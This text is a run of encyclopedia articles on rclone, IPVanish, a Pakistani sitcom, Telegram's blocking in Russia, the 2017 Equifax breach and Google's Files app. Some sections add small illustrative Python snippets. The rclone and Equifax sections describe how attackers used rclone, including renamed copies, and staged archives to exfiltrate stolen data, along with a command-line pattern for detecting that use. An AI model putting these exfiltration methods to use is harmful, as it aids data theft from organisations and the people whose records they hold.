Commands are provided to serve remotes over SFTP, HTTP, WebDAV, FTP and DLNA. Commands can have sub-commands and flags. Filters determine which files on a remote rclone commands are applied to. rclone rc passes commands or new parameters to existing rclone sessions and has an experimental web browser interface. Crypt remotes Rclone's crypt implements encryption of files at rest in cloud storage. It layers an encrypted remote over a pre-existing cloud or other remote. Crypt is commonly used to encrypt and decrypt media, for streaming, on consumer storage services such as Google Drive. Rclone's configuration file contains the crypt password. The password can be lightly obfuscated, or the whole rclone.conf file can be encrypted. Crypt can either encrypt file content and name, or additionally full paths. In the latter case there is a potential clash with cloud backends, such as Microsoft OneDrive, that have limited path lengths. Crypt remotes do not encrypt object modification time or size. The encryption mechanism for content, name and path is available, for scrutiny, on the rclone website. Key derivation is with scrypt. Example syntax (Linux) These examples describe paths and file names but object keys behave similarly. To recursively copy files from directory remote_stuff, at the remote xmpl, to directory stuff in the home folder:

$ rclone copy -v -P xmpl:/remote_stuff ~/stuff

-v enables logging and -P, progress information. By default rclone checks the file integrity (hash) after copy; can retry each file up to three times if the operation is interrupted; uses up to four parallel transfer threads, and does not apply bandwidth throttling. Running the above command again copies any new or changed files at the remote to the local folder but, like default rsync behaviour, will not delete files from the local directory that have been removed from the remote. 
To additionally delete files from the local folder which have been removed from the remote, more like the behaviour of rsync with a --delete flag:

$ rclone sync xmpl:/remote_stuff ~/stuff

And to delete files from the source after they have been transferred to the local directory, more like the behaviour of rsync with a --remove-source-files flag:

$ rclone move xmpl:/remote_stuff ~/stuff

To mount the remote directory at a mountpoint in the pre-existing, empty stuff directory in the home directory (the ampersand at the end makes the mount command run as a background process):

$ rclone mount xmpl:/remote_stuff ~/stuff &

Default rclone syntax can be modified. Alternative transfer, filter, conflict and backend-specific flags are available. Performance choices include number of concurrent transfer threads; chunk size; bandwidth limit profiling, and cache aggression. Example syntax (Windows) These examples describe paths and file names but object keys behave similarly. To recursively copy files from directory remote_stuff, at the remote xmpl, to directory stuff on E drive:

>rclone copy -v -P xmpl:remote_stuff E:\stuff

-v enables logging and -P, progress information. By default rclone checks the file integrity (hash) after copy; can retry each file up to three times if the operation is interrupted; uses up to four parallel transfer threads, and does not apply bandwidth throttling. Running the above command again copies any new or changed file at the remote to the local directory but will not delete from the local directory. 
To additionally delete, from the local directory, files which have been removed from the remote:

>rclone sync xmpl:remote_stuff E:\stuff

And to delete files from the source after they have been transferred to the local directory:

>rclone move xmpl:remote_stuff E:\stuff

To mount the remote directory from an unused drive letter, or at a mountpoint in a non-existent directory:

>rclone mount xmpl:remote_stuff X:
>rclone mount xmpl:remote_stuff E:\stuff

Default rclone syntax can be modified. Alternative transfer, filter, conflict and backend-specific options are available. Performance choices include number of concurrent transfer threads; chunk size; bandwidth limit profiling, and cache aggression. Academic evaluation In 2018, University of Kentucky researchers published a conference paper comparing use of rclone and other command-line cloud data transfer agents for big data. The paper was published as a result of funding by the National Science Foundation. Later that year, University of Utah's Center for High Performance Computing examined the impact of rclone options on data transfer rates. Rclone use at HPC research sites Examples are University of Maryland, Iowa State University, Trinity College Dublin, NYU, BYU, Indiana University, CSC Finland, Utrecht University, University of Nebraska, University of Utah, North Carolina State University, Stony Brook, Tulane University, Washington State University, Georgia Tech, National Institutes of Health, Wharton, Yale, Harvard, Minnesota, Michigan State, Case Western Reserve University, University of South Dakota, Northern Arizona University, University of Pennsylvania, Stanford, University of Southern California, UC Santa Barbara, UC Irvine, UC Berkeley, and SURFnet. Rclone and cybercrime May 2020 reports stated rclone had been used by hackers to exploit Diebold Nixdorf ATMs with ProLock ransomware. The FBI issued a Flash Alert MI-000125-MW on 4 May 2020 in relation to the compromise. 
They issued a further, related alert, 20200901–001, in September 2020. Attackers had exfiltrated and encrypted data from organisations involved in healthcare, construction, finance, and legal services. Multiple US government agencies and industrial entities were affected. Researchers established that the hackers spent about a month exploring the breached networks, using rclone to archive stolen data to cloud storage, before encrypting the target system. Reported targets included LaSalle County and the city of Novi Sad. The FBI warned in January 2021, in Private Industry Notification 20210106–001, of extortion activity using Egregor ransomware and rclone. Organisations worldwide had been threatened with public release of exfiltrated data. In some cases rclone had been disguised under the name svchost. Bookseller Barnes & Noble, US retailer Kmart, games developer Ubisoft and the Vancouver metro system have been reported as victims. An April 2021 cybersecurity investigation into SonicWall VPN zero-day vulnerability SNWLID-2021-0001 by FireEye's Mandiant team established that attackers UNC2447 used rclone for reconnaissance and exfiltration of victims' files. Cybersecurity and Infrastructure Security Agency Analysis Report AR21-126A confirmed this use of rclone in FiveHands ransomware attacks. A June 2021 Microsoft Security Intelligence Twitter post identified use of rclone in BazaCall cyber attacks. The miscreants sent emails encouraging recipients to contact a bogus call centre to cancel a paid-for service. The call centre team then instructed victims to download a hostile file that installed malware on the target network, ultimately allowing use of rclone for covert extraction of potentially sensitive data. Rclone Wars In a 2021 Star Wars Day blog article, Managed Security Service Provider Red Canary announced Rclone Wars, an allusion to Clone Wars. 
The post notes illicit use of other legitimate file transfer utilities in exfiltrate-and-extort schemes but focuses on MEGAsync, MEGAcmd and rclone. To identify use of renamed rclone executables on compromised devices, the authors suggest monitoring for distinctive rclone top-level commands and command-line flag strings such as remote: and \\. Rclone or rsync Rsync transfers files with other computers that have rsync installed. It operates at the block, rather than file, level and has a delta algorithm so that it only needs to transfer changes in files. Rsync preserves file attributes and permissions. Rclone has a wider range of content management capabilities, and types of backend it can address, but only works at a whole-file/object level. It does not currently preserve permissions and attributes. Rclone is designed to have some tolerance of intermittent and unreliable connections or remote services. Its transfers are optimised for high-latency networks. Rclone decides which of those whole files or objects to transfer after obtaining checksums, to compare, from the remote server. Where checksums are not available, rclone can use object size and timestamp. Rsync is single-threaded. Rclone is multi-threaded with a user-definable number of simultaneous transfers. Rclone can pipe data between two completely remote locations, sometimes without local download. During an rsync transfer, one side must be a local drive. Rclone ignores trailing slashes. Rsync requires their correct use. Rclone filters require the use of ** to refer to the contents of a directory. Rsync does not. Rsync enthusiasts can be rclone enthusiasts too. Rsync continued to influence rclone as of September 2020. Eponymous cloud storage service rsync.net provides remote Unix filesystems so that customers can run rsync and other standard Unix tools. They also offer rclone-only accounts. 
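The whole-file transfer decision described above, comparing checksums when the backend supplies them and falling back to size and modification time otherwise, can be sketched in a few lines of Python. The names and data structure here are illustrative assumptions, not rclone's internal Go types.

```python
# Sketch of a whole-file sync decision: prefer checksums when both sides
# expose them, otherwise compare size and modification time.
from dataclasses import dataclass
from typing import Optional

@dataclass
class FileInfo:
    size: int
    mtime: float
    checksum: Optional[str] = None  # None when the backend has no hashes

def needs_transfer(src: FileInfo, dst: Optional[FileInfo]) -> bool:
    if dst is None:                    # file missing at the destination
        return True
    if src.checksum and dst.checksum:  # both sides supply a hash: trust it
        return src.checksum != dst.checksum
    # fall back to size + modification time comparison
    return (src.size, src.mtime) != (dst.size, dst.mtime)

print(needs_transfer(FileInfo(10, 1.0, "abc"), FileInfo(10, 2.0, "abc")))  # False
print(needs_transfer(FileInfo(10, 1.0), FileInfo(10, 2.0)))                # True
```

Note how the checksum comparison, when available, makes the decision robust against mtime drift between backends, which is one reason rclone prefers hashes over timestamps.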
In 2016, a poster on Hacker News summarised rclone's relationship to rsync as:- (rclone) exists to give you rsync to things that aren't rsync. If you want to rsync to things that are rsync, use rsync. See also Rsync References External links 2012 software Cloud storage Network file systems Data synchronization Free backup software Backup software for Linux Free network-related software Network file transfer protocols Unix network-related software Free file transfer software Cloud storage gateways File transfer software Software using the MIT license SFTP clients FTP clients Free FTP clients MacOS Internet software Free file sharing software Cross-platform free software Free software programmed in Go Free storage software Object storage Distributed file systems Userspace file systems File copy utilities Disk usage analysis software Disk encryption Special-purpose file systems Cryptographic software Free special-purpose file systems Cloud computing Cloud infrastructure Free software for cloud computing Backup software for Windows Backup software Backup software for macOS Cloud clients Cloud applications
57452315
https://en.wikipedia.org/wiki/IPVanish
IPVanish
IPVanish VPN (also known as IPVanish) is a VPN service based in the United States, with applications for Microsoft Windows, macOS, Android, iOS, and Fire TV. Manual configuration is available for ChromeOS, Windows Phone, Linux, and DD-WRT routers. History IPVanish was founded in 2012 by Mudhook Media Inc., an independent subsidiary of Highwinds Network Group in Orlando, Florida. The VPN service started with 32 servers and a client for Windows operating systems. In later years, software support was expanded to include macOS, iOS, Android, and Fire TV. The VPN owns and controls a private fiber-optic network of tier-1 servers. IPVanish owns roughly 90% of its points of presence (POPs), where the company controls the data center and hardware, or "the rack and stack." Its infrastructure is leased from third-party operators in regions "where it doesn’t make sense to have our own gear," such as Albania. In 2017, Highwinds Network Group was acquired by CDN company StackPath which included IPVanish as part of the acquisition. In 2019, IPVanish was one of many VPN services acquired by J2 Global with their NetProtect business. Logging controversy According to a June 2018 article by TorrentFreak, court documents have shown that IPVanish handed over personal information about a customer to the Department of Homeland Security (HSI) in 2016. The customer was suspected of sharing child pornography on an IRC network. The information, which allowed HSI to identify the customer, consisted of the customer's name, his email address, details of his VPN subscription, his real IP address (Comcast) "as well as dates and times [he] connected to, and disconnected from, the IRC network.” The logging of the customer's IP address and connection timestamps to the IRC service contradicts IPVanish's privacy policy, which states that "[IPVanish] will never log any traffic or usage of our VPN." 
In 2017, IPVanish and its parent company were acquired by StackPath, whose founder and CEO, Lance Crosby, claimed that "at the time of the acquisition, [...] no logs existed, no logging systems existed and no previous/current/future intent to save logs existed." The story attracted attention on Reddit, when the court documents were posted on the /r/piracy subreddit. Technical details Features IPVanish VPN offers several features, including:
IPv6 leak protection
DNS leak protection
OpenVPN scramble
SOCKS5 web proxy
Unlimited bandwidth
Unlimited P2P
IP address cycling
Port forwarding
Access via UDP/TCP
Internet kill switch
Encryption For encryption, IPVanish uses the OpenVPN and IKEv2/IPsec technologies in its applications, while the L2TP and PPTP connection protocols can also be configured. IPVanish supports the AES (128-bit or 256-bit) specifications, with SHA-256 for authentication and an RSA-2048 handshake. Servers IPVanish owns and operates more than 1,500 remote servers in more than 75 locations. The largest concentration of VPN servers is located in the United States, United Kingdom, and Australia. The company suspended operations in Russia as of July 2016, due to conflicts with the company's zero-log policy and local law. In July 2020, IPVanish removed its servers from Hong Kong, alleging that the Hong Kong national security law puts Hong Kong under the "same tight internet restrictions that govern mainland China." IPVanish maintains its headquarters in the United States, which does not have mandatory data retention laws. Uses IPVanish funnels the internet traffic of its users through remote servers run by the service, hiding the user's IP address and encrypting all the data transmitted through the connection. Users can simultaneously connect an unlimited number of devices. Like other VPN services, IPVanish also has the ability to bypass internet censorship in most countries. 
By selecting a VPN server in a region outside their physical location, an IPVanish user can easily access online content that would otherwise be unavailable in their location. IPVanish can be used to play games that are regionally restricted due to licensing agreements. In their 2017 review of the service, IGN named IPVanish as "one of the best gaming VPNs." During a speed test of the VPN with League of Legends, the reviewer noted a ping drop of just one millisecond. Recognition In 2016, IPVanish was awarded the Silver Award for Startup of the Year from the Info Security PG's Global Excellence Awards, and Lifehacker AU rated the service as its #1 VPN. PC Magazine rated IPVanish "excellent" in an April 2017 review, praising its nonrestrictive BitTorrent practices while noting it as one of the more expensive VPNs. In a 2018 review highlighting IPVanish's 'zero logs' policies and nonprofit support, CNET ranked IPVanish as one of the best VPN services of the year. The reviewer also noted that its integrated plugin for Kodi, the open-source media streaming app, is unique to the VPN industry. TechRadar rated the service 4 out of 5 stars in their March 2018 review, commending it for its powerful features while criticizing its "lethargic support response". An annually updated TorrentFreak article reviewing the logging policies of VPN services lists IPVanish as an anonymous provider. Tom's Guide wrote that the lack of a kill switch on the mobile application "may be a downside for some". Related media In September 2015, the ex-husband of Philip Morris USA tobacco heiress Anne Resnick was accused of hacking his estranged wife's phone to spy on her during the divorce proceedings. During the deposition, the husband pleaded the Fifth Amendment 58 times when questioned about bank records indicating subscriptions to mSpy as well as IPVanish. 
See also Comparison of virtual private network services Internet privacy Encryption Secure communication References Virtual private network services
57455799
https://en.wikipedia.org/wiki/Kis%20Din%20Mera%20Viyah%20Howay%20Ga%20%28season%204%29
Kis Din Mera Viyah Howay Ga (season 4)
Kis Din Mera Viyah Howay Ga (Season 4) is a Pakistani comedy series that aired on Geo Entertainment as a Ramadan special sitcom, the fourth season of Kis Din Mera Viyah Howay Ga. The series previously premiered its seasons 1, 2 and 3 in 2011, 2012, and 2013 respectively. Every year new female leads are introduced, whereas the main characters of Nazaakat (Aijaz Aslam) and Sheedo (Faysal Qureshi) remain the same. The serial premiered its fourth season after a gap of five years on 17 May 2018, during Ramadan. The comedy serial re-ran on the channel from 25 August 2018, following Tohmat, and aired weekly. This season marks the first appearance of Ghana Ali, internet sensation Shafaat Ali, Fakhr-e-Alam and Yashma Gill in this comedy series franchise. This season is produced by Aijaz Aslam's own production house, Ice Media and Entertainment. Aijaz Aslam also plays a double role in the sitcom, as the antagonist Don Bhai and as die-hard Salman Khan fan Chaudhary Nazakat. Plot Don, an exact lookalike of Nazakat, is here on Earth. Can Nazakat have a wedding this season, or will Don have his day? Cast and characters Season overview Broadcasting Overview See also List of programs broadcast by Geo TV Geo Entertainment Suno Chanda References External links Ramadan special television shows Pakistani comedy television series 2018 Pakistani television series debuts
57457285
https://en.wikipedia.org/wiki/Blocking%20Telegram%20in%20Russia
Blocking Telegram in Russia
Blocking Telegram in Russia was the process of restricting access to the Telegram messenger on the territory of the Russian Federation. The technical process of this restriction began on April 16, 2018. The blocking led to interruptions in the operation of many third-party services, but had practically no effect on the availability of Telegram in Russia. Telegram was officially unblocked on 19 June 2020. Background The Yarovaya law, which requires telecom operators to keep all voice and messaging traffic of their customers for half a year, and their internet traffic for 30 days, went into effect in the Russian Federation on July 1, 2018. The position of Moscow's Meschansky district court is that, in accordance with the Yarovaya law, Telegram is required to store encryption keys from all user correspondence and provide them to Russia's Federal Security Service, the FSB, upon request. Telegram's management insists that this requirement is technically impracticable, since the keys of opt-in secret chats are stored on users' devices and are not in Telegram's possession. Pavel Durov, Telegram's co-founder, said that the FSB's demands violated the constitutional rights of Russian citizens to the privacy of correspondence. On 13 April 2018, Moscow's Tagansky District Court ruled, with immediate effect, to restrict access to Telegram in Russia. Telegram's appeal to the Russian Supreme Court was rejected. In April 2020, the Government of Russia started using the blocked Telegram platform to spread information related to the COVID-19 outbreak. On 18 June 2020, Roskomnadzor lifted its ban on Telegram after Telegram 'agreed to help with extremism investigations'. However, the court ruling that was the basis of the original ban remained in force, leaving the legal basis of the unblocking unclear. Courts and legal position of the parties The conflict between the FSB and Telegram began before the Yarovaya law came into effect.
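Telegram's technical argument rests on end-to-end key agreement: secret-chat keys are derived on the users' devices and never pass through the server. The toy Diffie-Hellman sketch below (illustrative parameters only; Telegram's actual MTProto protocol is far more involved) shows how two parties arrive at a shared key while a relay server only ever sees public values.

```python
import hashlib
import secrets

# Toy Diffie-Hellman exchange. The modulus below is far too small for
# real use; it is chosen only to make the sketch self-contained.
p = 2**127 - 1  # toy prime modulus
g = 3           # toy generator

a = secrets.randbelow(p - 2) + 2  # Alice's private value (her device only)
b = secrets.randbelow(p - 2) + 2  # Bob's private value (his device only)

A = pow(g, a, p)  # public values: these are all a relay server sees
B = pow(g, b, p)

# Each side derives the same chat key locally; the server never holds it.
key_alice = hashlib.sha256(str(pow(B, a, p)).encode()).digest()
key_bob = hashlib.sha256(str(pow(A, b, p)).encode()).digest()

assert key_alice == key_bob
```

Since the private values `a` and `b` never leave the devices, an operator in Telegram's position has no per-chat key to hand over, which is the crux of its claim that the FSB's demand was technically impracticable.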
In September 2017, the FSB filed a lawsuit over Telegram's non-fulfillment of the Yarovaya law. In October 2017, a judgment was delivered in favor of the FSB, imposing a fine on Telegram of 800,000 rubles. The reason cited was the lack of encryption keys for six persons accused of terrorism. According to a statement issued by one of the founders of Telegram, Pavel Durov, even if the request of the FSB was solely intended to help in capturing six terrorists, Telegram could not comply, as the mobile numbers that the FSB was concerned with either never had accounts in Telegram, or their accounts were deleted due to inactivity. At the same time, the FSB had demanded the creation of a technology that would enable them to access the correspondence of any users. According to Pavel Durov, the FSB's requirements were not feasible. Pavel Durov put out a call on October 16, 2017, for lawyers willing to represent Telegram in court to appeal the decision. Two days later Durov said that he had received 200 proposals from lawyers, and had chosen the Inter-regional Association of Human Rights Organizations "Agora" to represent Telegram in the court battles. Russia's Supreme Court rejected Telegram's lawsuit against the FSB on March 20, 2018. After the court ruling, the Russian watchdog Roskomnadzor said the messaging service had 15 days to provide the required information to the country's security agencies. The FSB defended its position, saying that providing the FSB with the technical ability to decode messages does not annul legal procedures such as obtaining court orders in order to inspect specific messages. On April 13, Moscow's Tagansky district court ruled to block access to Telegram in Russia over its failure to provide encryption keys to the FSB. Protest actions On April 22, 2018, "an action in support of free Internet" was held in multiple cities around Russia, timed to coincide with the seventh day of Telegram's blocking.
Residents of Russia launched paper airplanes (the symbol of Telegram) from the roofs of various buildings. The protest was planned on Telegram on the morning of April 22. Pavel Durov, one of the founders of Telegram, supported the action, but asked that the participants gather up the paper airplanes within an hour after the launch. On April 30, 2018, a rally in support of Telegram was held in the center of Moscow in response to the blocking. More than 12,000 people participated. See also Internet censorship Blocking Wikipedia in Russia Telegram in Iran References April 2018 events in Russia Internet censorship in Russia Telegram (software)
57542624
https://en.wikipedia.org/wiki/2017%20Equifax%20data%20breach
2017 Equifax data breach
The Equifax data breach occurred between May and July 2017 at the American credit bureau Equifax. Private records of 147.9 million Americans along with 15.2 million British citizens and about 19,000 Canadian citizens were compromised in the breach, making it one of the largest cybercrimes related to identity theft. In a settlement with the United States Federal Trade Commission, Equifax offered affected users settlement funds and free credit monitoring. In February 2020, the United States government indicted members of China's People's Liberation Army for hacking into Equifax and plundering sensitive data as part of a massive heist that also included stealing trade secrets, though the Chinese Communist Party denied these claims. Data breach The breach at Equifax was principally carried out through a vulnerability in third-party software for which a patch had been issued, but which Equifax had failed to apply to its servers. Equifax had been using the open-source Apache Struts as its website framework for systems handling credit disputes from consumers. A key security patch for Apache Struts was released on March 7, 2017, after a security exploit was found, and all users of the framework were urged to update immediately. Security experts found an unknown hacking group trying to find websites that had failed to update Struts as early as March 10, 2017, in order to find a system to exploit. As determined through postmortem analysis, the breach at Equifax started on May 12, 2017, when Equifax had yet to update its credit dispute website with the new version of Struts. The hackers used the exploit to gain access to internal servers on Equifax's corporate network. The information first pulled by the hackers included internal credentials for Equifax employees, which then allowed the hackers to search the credit monitoring databases under the guise of an authorized user.
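The failure described above was one of patch management: the affected Struts versions were publicly documented when the fix was released. As a hypothetical illustration (not Equifax's actual tooling), a dependency audit could flag the version ranges published for the Struts flaw, CVE-2017-5638, which covered Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10.

```python
# Hedged sketch of the kind of version check that would have flagged an
# unpatched framework. The vulnerable ranges below are those published
# for CVE-2017-5638; 2.3.32 and 2.5.10.1 were the fixed releases.

def parse(version: str) -> tuple:
    """Turn a dotted version string into a comparable tuple of ints."""
    return tuple(int(part) for part in version.split("."))


def struts_vulnerable(version: str) -> bool:
    """Return True if the Struts version falls in a vulnerable range."""
    v = parse(version)
    return (parse("2.3.5") <= v <= parse("2.3.31")) or (
        parse("2.5") <= v <= parse("2.5.10")
    )


assert struts_vulnerable("2.3.31")       # last vulnerable 2.3.x release
assert not struts_vulnerable("2.3.32")   # first patched 2.3.x release
assert not struts_vulnerable("2.5.10.1") # patched 2.5.x release
```

Python's tuple comparison makes the range test straightforward here; real dependency scanners perform the same kind of check against published advisory data for every library in an application.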
Using encryption to further mask their searches, the hackers performed more than 9,000 scans of the databases, extracted information into small temporary archives that were then transferred off the Equifax servers to avoid detection, and removed the temporary archives once complete. The activities went on for 76 days until July 29, 2017, when Equifax discovered the breach and, by July 30, 2017, shut off the exploit. At least 34 servers in twenty different countries were used at different points during the breach, making tracking the perpetrators difficult. While the failure to update Struts was a key failure, analysis of the breach found further faults in Equifax's systems that made the breach easier to carry out, including an insecure network design that lacked sufficient segmentation, potentially inadequate encryption of personally identifiable information (PII), and ineffective breach detection mechanisms. Information accessed in the breach included first and last names, Social Security numbers, birth dates, addresses and, in some instances, driver's license numbers for an estimated 143 million Americans, based on Equifax's analysis. Information on an estimated range of under 400,000 up to 44 million British residents, as well as 8,000 Canadian residents, was also compromised. Equifax later revealed that an additional 11,670 Canadians were affected. Credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personally identifiable information for approximately 182,000 U.S. consumers, were also accessed. Since the initial disclosure in September 2017, Equifax has expanded the number of records it discovered were accessed. In October 2017 and March 2018, Equifax reported that an additional 2.5 million and 2.4 million American consumer records, respectively, had been accessed, bringing the total to 147.9 million.
Equifax narrowed its estimate for UK consumers affected by the breach to 15.2 million in October 2017, of which 693,665 had sensitive personal data disclosed. Equifax also estimated the number of driver's licenses breached in the attack at 10–11 million. Security experts expected that the lucrative private data from the breach would be turned around and sold on black markets and the dark web, though as of May 2021, there had been no sign of any sale of this data. Because the data did not show up in the first 17 months following the breach, security experts theorized that either the hackers behind the breach were waiting a significant amount of time before selling the information, since it would be too "hot" to sell that close to the breach, or that a nation-state was behind the breach and was planning to use the data in a non-financial manner, such as for espionage. Disclosure and short-term responses On September 7, 2017, Equifax disclosed the breach and its scope: it affected over 140 million Americans. VentureBeat called the exposure of data on more than 140 million customers "one of the biggest data breaches in history." Equifax shares dropped 13% in early trading the day after the breach was made public. Numerous media outlets advised consumers to request a credit freeze to reduce the impact of the breach. On September 10, 2017, three days after Equifax revealed the breach, Congressman Barry Loudermilk (R-GA), who had received $2,000 in campaign funding from Equifax, introduced a bill to the U.S. House of Representatives that would reduce consumer protections in relation to the nation's credit bureaus, including capping potential damages in a class action suit to $500,000 regardless of class size or amount of loss. The bill would also eliminate all punitive damages. Following criticism by consumer advocates, Loudermilk agreed to delay consideration of the bill "pending a full and complete investigation into the Equifax breach".
On September 15, Equifax released a statement announcing the immediate departures and replacements of its Chief Information Officer and Chief Security Officer. The statement included bullet-point details of the intrusion, its potential consequences for consumers, and the company's response. The company said it had hired cybersecurity firm Mandiant on August 2 to investigate the intrusion internally. The statement did not specify when U.S. government authorities were notified of the breach, although it did assert "the company continues to work closely with the FBI in its investigation". On September 28, new Equifax CEO Paulino do Rego Barros Jr. responded to criticism of Equifax by promising that the company would, from early 2018, allow "all consumers the option of controlling access to their personal credit data", and that this service would be "offered free, for life". On October 26, Equifax appointed technology executive Scott A. McGregor to its board of directors. In announcing the change, the board's chairman noted McGregor's "extensive data security, cybersecurity, information technology and risk management experience". The Wall Street Journal reported that he joined the board's technology committee, which has duties that include oversight of cybersecurity. Litigation Numerous lawsuits were filed against Equifax in the days after the disclosure of the breach. In one suit, the law firm Geragos & Geragos indicated it would seek up to $70 billion in damages, which would make it the largest class-action suit in U.S. history. Since October 2017, hundreds of consumers have sued Equifax over the data breach, some winning small claims cases in excess of $9,000, including actual damages, future damages, anxiety, monitoring fees and punitive damages. In September 2017, Richard Cordray, then director of the Consumer Financial Protection Bureau (CFPB), authorized an investigation into the data breach on behalf of affected consumers.
However, in November 2017, Mick Mulvaney, President Donald Trump's budget chief, whom Trump appointed to replace Cordray, was reported by Reuters to have "pulled back" on the probe, along with shelving Cordray's plans for on-the-ground tests of how Equifax protects data. The CFPB also rebuffed bank regulators at the Federal Reserve Bank, Federal Deposit Insurance Corporation and Office of the Comptroller of the Currency who offered to assist with on-site exams of credit bureaus. Senator Elizabeth Warren, who released a report on the Equifax breach in February 2018, criticized Mulvaney's actions, stating: "We're unveiling this report while Mick Mulvaney is killing the consumer agency's probe into the Equifax breach. Mick Mulvaney shoots another middle finger at consumers." On July 22, 2019, Equifax agreed to a settlement with the Federal Trade Commission (FTC), CFPB, 48 U.S. states, Washington, D.C., and Puerto Rico to alleviate damages to affected individuals and make organizational changes to avoid similar breaches in the future. The total cost of the settlement included $300 million to a fund for victim compensation, $175 million to the states and territories in the agreement, and $100 million to the CFPB in fines. In July 2019, the FTC published information on how affected individuals could file a claim against the victim compensation fund using the website EquifaxBreachSettlement.com. Perpetrators The United States Department of Justice announced on February 10, 2020, that it had indicted four members of China's military on nine charges related to the hack, though there has been no additional evidence that China has since used the data from the hack. The Chinese government denied that the four accused had any involvement with the hack. Criticism Following the announcement of the May–July 2017 breach, Equifax's actions received widespread criticism.
Equifax did not immediately disclose whether PINs and other sensitive information were compromised, nor did it explain the delay between its discovery of the breach in July and its public announcement in early September. Equifax stated that the delay was due to the time needed to determine the scope of the intrusion and the large amount of personal data involved. It was also revealed that three Equifax executives sold almost $1.8 million of their personal holdings of company shares days after Equifax discovered the breach but more than a month before the breach was made public. The company said the executives, including the chief financial officer John Gamble, "had no knowledge that an intrusion had occurred at the time they sold their shares". On September 18, Bloomberg reported that the U.S. Justice Department had opened an investigation to determine whether or not insider trading laws had been violated. "As Bloomberg notes, these transactions were not pre-scheduled trades and they took place on August 2, three days after the company learned of the hack". When publicly revealing the intrusion to its systems, Equifax offered a website (https://www.equifaxsecurity2017.com) for consumers to learn whether they were victims of the breach. Security experts quickly noted that the website had many traits in common with a phishing website: it was not hosted on a domain registered to Equifax, it had a flawed TLS implementation, and it ran on WordPress, which is not generally considered suitable for high-security applications. These issues led OpenDNS to classify it as a phishing site and block access. Moreover, members of the public wanting to use the Equifax website to learn if their data had been compromised had to provide a last name and six digits of their social security number.
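One of the phishing traits noted above, hosting the lookup site on a domain not registered to Equifax, can be illustrated with a naive check. This is illustrative only: real classifiers consult the Public Suffix List rather than simply taking the last two labels, and weigh many signals beyond the domain name.

```python
# Hedged sketch: a breach-lookup site hosted off the company's own
# registrable domain is a classic phishing signal, which is one reason
# equifaxsecurity2017.com drew suspicion.

def registrable_domain(host: str) -> str:
    """Naive registrable domain: the last two DNS labels.

    Real implementations use the Public Suffix List to handle
    multi-label suffixes such as .co.uk correctly.
    """
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


assert registrable_domain("www.equifax.com") == "equifax.com"
# The breach site does not share Equifax's registrable domain:
assert registrable_domain("www.equifaxsecurity2017.com") != "equifax.com"
```

Had the lookup tool lived at a subdomain such as security2017.equifax.com, this check would have tied it to the company's own domain, which is the substance of the later criticism that Equifax should have used a subdomain of equifax.com.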
The website set up to check whether a person's personal data had been breached (trustedidpremier.com) was determined by security experts and others to return apparently random results instead of accurate information. As with https://www.equifaxsecurity2017.com, this website, too, was registered and constructed like a phishing website, and it was flagged as such by several web browsers. The Trusted ID Premier website contained terms of use, dated September 6, 2017 (the day before Equifax announced the security breach) which included an arbitration clause with a class action waiver. Attorneys said that the arbitration clause was ambiguous and that it could require consumers who accepted it to arbitrate claims related to the cybersecurity incident. According to Polly Mosendz and Shahien Nasiripour, "some fear[ed] that simply using an Equifax website to check whether their information was compromised bound them to arbitration". The equifax.com website has separate terms of use with an arbitration clause and class action waiver, but, according to Brian Fung of The Washington Post, "it's unclear if that applies to the credit monitoring program". New York Attorney General Eric Schneiderman demanded that Equifax remove the arbitration clause. Responding to arbitration-related concerns, on September 8, Equifax issued a statement stating that "in response to consumer inquiries, we have made it clear that the arbitration clause and class action waiver included in the Equifax and TrustedID Premier terms of use does not apply to this cybersecurity incident". Joel Winston, a data protection lawyer, argued that the announcement disclaiming the arbitration clause "means nothing" because the terms of use state that they are the "entire agreement" between the parties. 
The arbitration clause was later removed from equifaxsecurity2017.com, and the equifax.com terms of use were amended on September 12 to state that they do not apply to www.equifaxsecurity2017.com, www.trustedidpremier.com, or www.trustedid.com and to exclude claims arising from those sites or the security breach from arbitration. Responding to continuing public outrage, Equifax announced on September 12 that they "are waiving all Security Freeze fees for the next 30 days". Equifax has been criticized by security experts for registering a new domain name for the site instead of using a subdomain of equifax.com. On September 20, it was reported that Equifax had been mistakenly linking to an unofficial "fake" web site instead of their own breach notification site in at least eight separate tweets, unwittingly helping to direct a reported 200,000 hits to the imitation site. A software engineer named Nick Sweeting created the unauthorized Equifax web site to demonstrate how the official site could easily be confused with a phishing site. Sweeting's site, however, was upfront about not being official, telling visitors who had entered sensitive information that "you just got bamboozled! this isnt a secure site! Tweet to @equifax to get them to change it to equifax.com before thousands of people loose their info to phishing sites!" Equifax apologized for the "confusion" and deleted the tweets linking to this site. See also Chinese cyberwarfare Chinese espionage in the United States References Data breaches in the United States 2017 controversies in the United States May 2017 crimes in the United States June 2017 crimes in the United States July 2017 crimes in the United States September 2017 events in the United States Hacking in the 2010s Identity theft incidents Internet privacy
57554020
https://en.wikipedia.org/wiki/Files%20%28Google%29
Files (Google)
Files (formerly known as Files Go) is a file management app developed by Google for file browsing, media consumption, storage clean-up and offline file transfer. It was released by Google on December 5, 2017, with a custom version for China released on May 30, 2018. Features The app is currently only available on the Android operating system, and includes three tabs: Clean, Browse, and Share. On Google Pixel devices, the Share tab is found by clicking the menu button. Clean mode This page identifies unused apps, large files, and duplicate files which users may no longer need. It can also notify the user when the storage is almost full. There is also a "Trash" feature, in which contents will be permanently deleted after 30 days. Browse mode This page displays recently accessed files on the top by folder, and multiple categories on the bottom such as: "Downloads", "Images", "Videos", "Audio", "Documents & Other", and "Apps". It also includes a "Favorites" folder, a "Safe Folder" which protects files using a pattern or a PIN, as well as two buttons leading to "Internal storage" and "Other storage". Alongside that, the app also has a media player/image viewer, and the ability to back up files to Google Drive. Share mode Files uses peer-to-peer sharing (powered by Nearby Share) to send and receive files or apps. It also uses encryption to keep shared contents private. References External links File managers File transfer software Google software Android (operating system) software
57554906
https://en.wikipedia.org/wiki/Les%20%C3%89corch%C3%A9s
Les Écorchés
